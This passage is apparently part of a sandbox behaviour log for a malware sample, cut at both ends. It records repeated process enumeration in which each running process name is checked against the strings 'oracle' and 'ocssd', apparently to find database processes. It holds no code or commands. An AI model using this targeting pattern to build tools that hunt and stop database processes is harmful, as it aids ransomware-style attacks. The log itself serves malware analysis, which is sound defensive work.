lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.342] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543f58 [0092.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.342] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.342] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0092.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.343] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543f70 [0092.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3543f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.343] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0092.343] StrStrIA (lpFirst="dllhost.exe", lpSrch="oracle") returned 0x0 [0092.343] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.345] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3544198 [0092.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3544198, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.345] StrStrIA (lpFirst="taskhostw.exe", lpSrch="oracle") returned 0x0 [0092.345] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0092.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.347] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3544030 [0092.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3544030, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0092.347] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0092.347] StrStrIA (lpFirst="UsoClient.exe", lpSrch="oracle") returned 0x0 [0092.347] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.348] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3544060 [0092.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3544060, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.348] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.348] StrStrIA (lpFirst="taskhostw.exe", lpSrch="oracle") returned 0x0 [0092.348] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0092.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0092.350] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3542eb8 [0092.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3542eb8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0092.350] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0092.350] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="oracle") returned 0x0 [0092.350] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0092.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.351] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3542dd8 [0092.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3542dd8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0092.352] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0092.352] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="oracle") returned 0x0 [0092.352] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0092.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.353] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x353c0d8 [0092.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x353c0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0092.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0092.353] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="oracle") returned 0x0 [0092.353] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.354] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544078 [0092.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3544078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0092.355] StrStrIA (lpFirst="conhost.exe", lpSrch="oracle") returned 0x0 [0092.355] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.356] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544360 [0092.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3544360, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0092.356] StrStrIA (lpFirst="conhost.exe", lpSrch="oracle") returned 0x0 [0092.356] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.357] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35442d0 [0092.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35442d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.357] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.357] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0092.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.358] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544408 [0092.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3544408, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0092.358] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0092.358] StrStrIA (lpFirst="rxodge.exe", lpSrch="oracle") returned 0x0 [0092.359] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0092.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.360] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544390 [0092.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3544390, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0092.360] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0092.360] StrStrIA (lpFirst="sppsvc.exe", lpSrch="oracle") returned 0x0 [0092.360] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0092.361] CloseHandle (hObject=0x350) returned 1 [0092.361] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0092.389] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.390] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3542ef8 [0092.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3542ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0092.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0092.390] StrStrIA (lpFirst="[System Process]", lpSrch="ocssd") returned 0x0 [0092.390] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0092.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.391] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547778 [0092.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547778, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0092.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0092.391] StrStrIA (lpFirst="System", lpSrch="ocssd") returned 0x0 [0092.391] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0092.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.393] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35441c8 [0092.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35441c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0092.393] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0092.393] StrStrIA (lpFirst="smss.exe", lpSrch="ocssd") returned 0x0 [0092.393] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.394] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35442e8 [0092.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35442e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0092.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0092.394] StrStrIA (lpFirst="csrss.exe", lpSrch="ocssd") returned 0x0 [0092.394] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0092.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.395] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35442b8 [0092.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35442b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0092.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0092.395] StrStrIA (lpFirst="wininit.exe", lpSrch="ocssd") returned 0x0 [0092.395] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.397] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3544300 [0092.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3544300, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0092.397] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0092.397] StrStrIA (lpFirst="csrss.exe", lpSrch="ocssd") returned 0x0 [0092.397] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0092.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.398] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35442a0 [0092.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35442a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0092.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0092.398] StrStrIA (lpFirst="winlogon.exe", lpSrch="ocssd") returned 0x0 [0092.398] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0092.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.399] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3544420 [0092.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3544420, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0092.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0092.400] StrStrIA (lpFirst="services.exe", lpSrch="ocssd") returned 0x0 [0092.400] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0092.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.401] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3544450 [0092.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3544450, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0092.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0092.401] StrStrIA (lpFirst="lsass.exe", lpSrch="ocssd") returned 0x0 [0092.401] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.403] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35443c0 [0092.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35443c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.403] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.403] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, 